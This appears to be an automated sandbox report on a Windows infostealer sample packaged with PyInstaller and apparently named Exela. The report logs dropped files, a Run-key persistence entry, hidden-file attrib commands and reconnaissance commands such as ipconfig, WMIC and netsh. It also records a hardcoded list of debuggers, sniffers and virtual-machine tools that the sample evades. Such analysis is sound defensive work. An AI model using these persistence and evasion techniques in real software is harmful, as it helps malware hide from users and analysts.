            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\libssl-1_1.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\libcrypto-1_1.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\_cffi_backend.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\select.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\multidict\_multidict.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\python311.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\libffi-8.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\_decimal.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_http_writer.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\_socket.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\_ctypes.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\_hashlib.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_helpers.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\_queue.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\sqlite3.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\libffi-8.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_http_parser.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\_cffi_backend.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\frozenlist\_frozenlist.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\_socket.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\_bz2.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\select.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\python3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\yarl\_quoting_c.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\_overlapped.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_http_parser.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\python311.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\sqlite3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_websocket.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_helpers.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\frozenlist\_frozenlist.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\yarl\_quoting_c.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\libcrypto-1_1.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\_ssl.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\_uuid.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\_asyncio.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\libssl-1_1.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_websocket.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_http_writer.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602\multidict\_multidict.cp311-win_amd64.pydJump to dropped file
            Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Exela Update Service
            Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Exela Update Service
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA751E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF72AA751E0
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XENSERVICE.EXEP5
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QEMU-GA.EXE
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "QEMU-GA.EXE"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEP
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELF.BANNED_PROCESS = ["HTTP TOOLKIT.EXE", "HTTPDEBUGGERUI.EXE","WIRESHARK.EXE", "FIDDLER.EXE", "REGEDIT.EXE", "TASKMGR.EXE", "VBOXSERVICE.EXE", "DF5SERV.EXE", "PROCESSHACKER.EXE", "VBOXTRAY.EXE", "VMTOOLSD.EXE", "VMWARETRAY.EXE", "IDA64.EXE", "OLLYDBG.EXE",
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "SBIEDLL.DLL"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "VMUSRVC.EXE"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "OLLYDBG.EXE"0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XENSERVICE.EXE0F
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE", # XEN
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "SBIEDLL.DLL"P
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXEP.
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMUSRVC.EXE
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "PROCESSHACKER.EXE"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "PROCESSHACKER.EXE"P/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "WIRESHARK.EXE"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QEMU-GA.EXE05
